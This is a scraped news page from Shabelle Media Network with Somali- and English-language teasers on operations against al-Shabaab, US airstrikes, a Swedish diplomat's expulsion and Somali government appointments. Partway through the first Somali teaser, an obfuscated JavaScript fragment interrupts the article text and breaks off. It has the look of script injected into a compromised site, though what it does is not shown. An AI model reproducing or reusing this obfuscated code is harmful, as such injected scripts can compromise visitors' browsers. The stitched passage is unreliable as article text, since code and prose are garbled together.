Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Daawo Howlgal Ciidamada Jubaland ka sameeyeen gobolka Jubada Hoose

KISMAAYO - Ciidamada maamulka Jubaland ayaa howlgal militeri ka sameeyay qeybo kamid ah gobolka Jubada Hoose, iyagoo qabsadey deegaan muhiim ah, hub iyo saanad Ciidan.   Howlhalka ayaa wuxuu ahaa mid qorsheysan oo la fuliyay si looga hortago weerar Al-Shabaab qorsheynaysay, waxaana lala eegtay goob ay isku aruusanaysanayeen dagaalyahano hubeysan, sida ay sheegeen Saraakiisha Ciidanka. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...

Mareykanka oo xoojiyay dagaalka uu kula jiro Al-Shabaab

WASHINGTON - Khatarta Al-Shabaab  ayaa kordhaysa sababo la xiriira iskaashiga ay la leeyihiin Huutiyiinta Yemen, sida uu sheegay taliyaha ugu sareeya ee ciidamada Mareykanka ee Afrika Khamiistii.   Ciidamada Mareykanka ayaa bilaabay ololaha ballaaran ee lagu bartilmaameedsanayo kooxda tan iyo markii Madaxweyne Donald Trump uu xilka qabtay. Toddobaadkii hore, ciidamada Mareykanka ayaa fuliyay duqeyn cirka ah gudaha Soomaaliya, taasoo lagu dilay xubno...

Emerging al-Shabaab–Houthi axis a ‘heightened terrorist threat,’ warns top US general

WASHINGTON - Somalia’s al-Shabaab is a heightened terrorist threat because of its collusion with Yemen’s Houthis, the top US general for Africa said Thursday.   The US military began an expanded campaign targeting the terrorist group in Somalia shortly after US President Donald Trump took office. Last weekend, the US military carried out an airstrike Saturday in Somalia, killing several ISIS operatives,...

Somalia Expels Swedish Diplomat Over Allegations of Undermining Government’s Reputation

MOGADISHU, Somalia (SMN) — The Federal Government of Somalia recently expelled Anna Saleem Högberg, Sweden's Deputy Ambassador and Head of Development Cooperation, following accusations that she had undermined the reputation of the Somali government. This decision came after serious allegations were levied against Högberg regarding her conduct and actions, which were believed to have damaged the image and dignity of...

Anna Saleem Högberg oo laga cayriyay dalka Soomaaliya

MUQDISHO, Soomaaliya - Dowladda Federaalka Soomaaliya ayaa dhawaan dalka eriday Anna Saleem Högberg, safiir-ku-xigeenka iyo madaxda Iskaashiga Horumarinta ee Iswiidhan, kadib markii lagu eedeeyey inay sumcad-dil ku samaysay dowladda Soomaaliya.   Go’aankan ayaa ka dambeeyey eedaymo culus oo lagu soo oogay Högberg, kuwaas oo ku saabsan habdhaqankeeda iyo falalka ay ku eedeysan tahay inay dhaawaceen sumcadda iyo xushmadda dowladda Soomaaliyeed. Wararka...

Somalia Forms New Committee to Strengthen Fight Against Al-Shabaab and ISIS

Mogadishu, Thursday, April 3, 2025 — Somali Prime Minister Hamza Abdi Barre has appointed a National Committee for the Support of the War against terrorist groups al-Shabaab and ISIS.   The committee, which will oversee the coordination of national efforts to combat these extremist groups, will be led by the country’s Second Deputy Prime Minister, Abdishakur Abdi Ali. The newly formed committee...

Ra’iisul Wasaaraha Soomaaliya oo magacaabey Gudi cusub

Muqdisho, Khamiis, 03 Abriil 2025: — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa maanta magacaabay Guddiga Qaran ee Taakuleynta Dagaalka lagula jira kooxaha Khawaarijta ah ee Shabaab iyo Daacish.   Xubnaha guddigan ayaa lagu soo bandhigay in ay ka kooban yihiin khubaro iyo mas’uuliyiin sare, kuwaas oo si dhow u taageeri doona dagaalka lagula jiro kooxaha argagixisada...

Somali cabinet discusses military operations against Al-Shabaab, oil exploration progress

MOGADISHU, Somalia — The Cabinet of the Federal Government of Somalia held its regular meeting today, focusing on the ongoing military operations to eradicate terrorist groups operating in various regions of the country.   During the meeting, a detailed report was presented regarding the current battles aimed at eliminating the extremist factions, with the Cabinet praising the bravery and sacrifices of...

Shirka Gollaha Wasiiradda oo lagu gorfeeyay qodobo Muhiim ah

Muqdisho, Khamiis, 03 Abriil 2025: — Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay kulankoodii caadiga ahaa, ayaa looga hadlay dagaalka lagu ciribtirayo kooxaha Khawaarijta ah ee ka socda qeybo ka mid ah gobollada dalka.   Kulanka ayaa lagu soo bandhigay warbixin faah-faahsan oo ku aaddan dagaallada socda ee lagu ciribtirayo argagixisada, iyada oo goluhu bogaadiyey geesinimada iyo naf-huridda ciidanka...

Somali President Appoints New Navy Chief to Bolster Maritime Security

MOGADISHU, April 3, 2025 - Somali President Hassan Sheikh Mohamud on Wednesday named Brigadier General Abdiwahab Abdullahi Omar as the new commander of the Somali Navy, signaling fresh efforts to strengthen maritime security and reassert control over the country's vast coastline.   In a statement from the president's office, Mohamud underscored the critical importance of maintaining a robust naval force to...

WARAR KALE

Somalia chairs meeting of African ambassadors in Cairo to strengthen continental cooperation

CAIRO — Somalia chaired the regular meeting of the Group of African Ambassadors in Cairo on Tuesday, with diplomats discussing ways to strengthen continental...

African Union, EU discuss support for Somalia security mission amid visa tensions

MOGADISHU — The head of the African Union Support and Stabilization Mission in Somalia (AUSSOM) held talks on Tuesday with senior European Union officials...

Ra’iisul wasaare Abiy oo ka hadlay xiriirka labada dal iyo madaxweynaha Soomaaliya

Addis Ababa  — Ra’iisul wasaare Abiy Axmed ayaa Isniintii shalay wadahadallo laba geesood ah la yeeshay madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, si loo xoojiyo...